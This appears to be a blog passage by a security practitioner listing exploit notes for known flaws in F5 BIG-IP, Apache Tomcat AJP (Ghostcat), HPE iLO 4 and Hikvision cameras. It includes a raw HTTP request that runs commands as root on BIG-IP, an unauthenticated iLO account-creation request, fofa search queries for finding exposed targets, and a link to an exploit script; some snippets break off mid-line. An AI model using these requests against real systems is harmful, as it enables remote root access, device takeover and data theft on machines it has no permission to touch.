Principle: When HTTP Basic authentication and the X-F5-Auth-Token header are set at the same time and the header value is empty, the program's identity verification is bypassed, and remote command execution is possible through a specific interface.
Affected versions:
Impact: root privileges can be obtained and commands executed as root.
PoC & EXP
Manual:
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.59.7
Content-Type: application/json
X-F5-Auth-Token:
Authorization: Basic YWRtaW46
Content-Length: 52

{ "command": "run", "utilCmdArgs": "-c id" }
Script:
import requests
import json
import sys
requests.packages.urllib3.disable_warnings()
proxies = {'http': 'http://localhost:7890', 'https': 'http://l
Principle: Because of an implementation flaw in the Tomcat AJP protocol, the related parameters are attacker-controllable; by constructing specific parameters, an attacker can read arbitrary files under the server's webapps directory, but cannot traverse into a parent directory.
Affected versions:
Apache Tomcat 6 ALL
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
Impact: When the website has a file-upload function, this vulnerability can be combined with file inclusion to execute code.
PoC & EXP
fofa: port="8009" && country="CN"
Script link: https://github.com/00theway/Ghostcat-CNVD-2020-10487/
Principle: Unauthorized access; because the add-user operation does not verify the identity of the operator, users can be added without authorization.
Affected versions: iLO 4 firmware, 2.xx versions below 2.54
Impact: Full access to the web panel can be obtained, and the host can be controlled via HPE iLO's built-in remote control software. Download address: https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_4f842ceb31cf48d392e22705a8
PoC & EXP
fofa: title="iLO"
Manual:
# POC
GET /rest/v1/AccountService/Accounts HTTP/1.1
Host: x.x.x.x:x
Content-Length: 273
Accept-Encoding: gzip, deflate
Accept: */*
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Content-Type: application/json
# EXP
POST /rest/v1/AccountService/Accounts HTTP/1.1
Host: x.x.x.x:x
C
Principle: Classic unauthorized access; because sensitive paths do not verify the requester's identity, they can be accessed without authorization.
Affected versions:
DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 Build 160530
DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401
DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125
DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414
DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421
DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928
DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106
Impact: Sensitive camera information that can be obtained: usernames, camera snapshots, camera user configuration
Equinox
A cybersecurity practitioner who enjoys sharing